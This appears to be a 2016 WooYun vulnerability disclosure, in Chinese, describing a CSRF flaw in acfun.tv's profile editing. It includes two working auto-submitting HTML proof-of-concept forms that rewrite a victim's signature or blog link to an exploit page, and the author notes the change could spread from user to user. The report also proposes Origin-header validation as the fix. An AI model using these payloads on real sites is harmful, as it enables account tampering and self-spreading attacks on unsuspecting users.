当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167754

漏洞标题:弹幕某处CSRF漏洞

相关厂商:广州弹幕网络科技有限公司北京分公司

漏洞作者: lex1993

提交时间:2016-01-06 18:16

修复时间:2016-01-11 18:18

公开时间:2016-01-11 18:18

漏洞类型:CSRF

危害等级:中

自评Rank:6

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

有防范措施却没有采用,导致了CSRF

详细说明:

在编辑资料页面:http://www.acfun.tv/member/#area=profile
简单的一点代码:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<form action="http://www.acfun.tv/member/signSubmit.aspx" method="POST" id="form">
<input type="hidden" name="sign" value="想要更多你懂的资源,请访问:http://127.0.0.1/test/sign.html" />
</form>
<script>document.getElementById("form").submit();</script>
</body>
</html>


访问之后就更改成功了签名,还把签名改成了诱惑点击的漏洞利用页面,这样只要别人看到这个签名访问这个网站自己的签名也会被改成这个漏洞利用页面,有传播的可能性。
同样,下面的拓展信息也可以这样更改,将个人资料更改为男同,个人主页修改为漏洞利用页面

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<form action="http://www.acfun.tv/member/profileSubmit.aspx" method="POST" id="form">
<input type="hidden" name="comefrom" value="" />
<input type="hidden" name="qq" value="" />
<input type="hidden" name="blog" value="http://127.0.0.1/test/profile.html" />
<input type="hidden" name="realname" value="" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="sextrend" value="0" />
</form>
<script>document.getElementById("form").submit();</script>
</body>
</html>


更改之后页面为

5.jpg


也是这样可以传播下去,然后大家的资料都被改了

漏洞证明:

见详细说明

修复方案:

发送的HTTP请求头里面明明有Origin字段,却没有验证,用这个防范CSRF简单有有效

版权声明:转载请注明来源 lex1993@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-11 18:18

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-12 14:55 | GreatPig ( 路人 | Rank:2 漏洞数:1 | 渗透测试)

    将个人资料更改为男同,厂商一看,怒忽视